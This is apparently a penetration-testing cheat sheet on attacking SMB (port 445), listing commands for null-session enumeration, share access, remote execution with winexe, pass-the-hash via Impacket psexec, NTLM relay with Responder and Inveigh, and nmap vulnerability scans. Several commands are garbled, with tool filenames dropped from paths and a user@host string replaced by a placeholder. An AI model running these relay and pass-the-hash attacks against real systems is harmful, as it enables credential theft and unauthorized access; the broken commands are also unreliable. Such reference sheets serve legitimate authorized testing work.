445 - SMB

Check for null sessions

crackmapexec smb -u '' -p ''
enum4linux <ip>

Connecting to SMB Shares

List SMB shares

smbclient -L [IP]

Connect to smb share

smbclient \\\\[ip]\\[share name]
rpcclient -U "" -N [ip]
enum4linux -a <ip>
/usr/bin/winexe -U mad01/user123%abcABC1234 // ipconfig

Using psexec from Impacket

/usr/share/doc/python3-impacket/examples/ -hashes aad3b435b51404eeaad3b435b51404ee:a40cad43aedd6bdddddddddf45 [email protected] Relay

For SMB Relay to be possible, you must turn off SMB and HTTP within the responder config file (you can change it back when you have finished)
Set responder.conf to:
Then run responder:
sudo python3.9 /usr/share/responder/ -I eth0 -w -F -v
Then run the following in another terminal session
sudo python3.9 /usr/share/responder/tools/ -t <target_IP> -u ALL

Inveigh Relay

Session attack requires SMB tools from Invoke-TheHash
Invoke-InveighRelay -ConsoleOutput Y -Target -Command "...."

Create an SMB Share

sudo impacket-smbserver share . -smb2support

Scan for common vulns

nmap --script smb-vuln* -p 139,445
Last modified 1mo ago